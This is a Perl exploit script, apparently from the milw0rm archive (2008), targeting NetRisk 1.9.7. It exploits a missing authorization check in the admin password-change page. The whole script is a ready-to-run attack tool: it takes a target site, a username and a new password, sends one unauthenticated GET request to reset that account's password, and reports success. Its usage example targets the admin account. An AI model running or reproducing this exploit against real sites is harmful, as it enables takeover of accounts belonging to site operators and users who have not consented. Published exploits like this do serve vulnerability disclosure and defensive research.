#!/usr/bin/perl #=========================================================================================================================# # _ ____ _ _ _ _ # # __ ___ __| |__ /_ _ ___ | |_ ___| | |_____ __ _____| |__ ___ _ _ # # / _/ _ \/ _` ||_ \ '_|_ / _ | ' \/ -_) | / _ \ V V / -_) '_ \ _ / -_) || | # # \__\___/\__,_|___/_| /__| (_) |_||_\___|_|_\___/\_/\_/\___|_.__/ (_) \___|\_,_| # #=========================================================================================================================# # Author: Cod3rZ # # Site: http://cod3rz.helloweb.eu # #=========================================================================================================================# # Status: Public # #=========================================================================================================================# # Board: NetRisk 1.9.7 # # Download: http://phprisk.org/netrisk_1.9.7.zip # #=========================================================================================================================# # Vuln Type: Remote Password Change [Exploit] # # Severity: Highest # #=========================================================================================================================# # The ACP haven't control and we can change the password of the other users # #=========================================================================================================================# # http://[site]/admin/change_submit.php?username=[user]&new_pass=[newpass] # #=========================================================================================================================# # NetRisk contains a lot of bugs: RFI, SQL Injection, ecc; but this is the highest vuln and i wouldn't post those # #=========================================================================================================================# use LWP::UserAgent; use HTTP::Request::Common; $lwp = new LWP::UserAgent; system('cls'); $site = $ARGV[0]; $user = $ARGV[1]; $pass = $ARGV[2]; print q{ --------------------------------------------------------------------- :: NetRisk 1.9.7 Remote Password Change Exploit :: --------------------------------------------------------------------- Author : Cod3rZ Email : songforthemoment@yahoo.it Site : http://cod3rz.helloweb.eu ---------------------------------------------------------------------}; if(!$site || !$user || !$pass) { print q{ Usage: perl netrisk.pl [site] [user] [newpass] Usage: perl netrisk.pl site.com/netrisk admin 123456 ---------------------------------------------------------------------}; system('exit'); } else { print " Site: $site User: $user Pass: $pass --------------------------------------------------------------------- Waiting... ---------------------------------------------------------------------"; $connect = $lwp->request(GET $site."/admin/change_submit.php?username=".$user."&new_pass=".$pass); $content = $connect->content; if($content =~ /username->/) { print " Password Changed ---------------------------------------------------------------------"; } else { print " Error ---------------------------------------------------------------------"; } } # http://cod3rz.helloweb.eu # milw0rm.com [2008-01-05]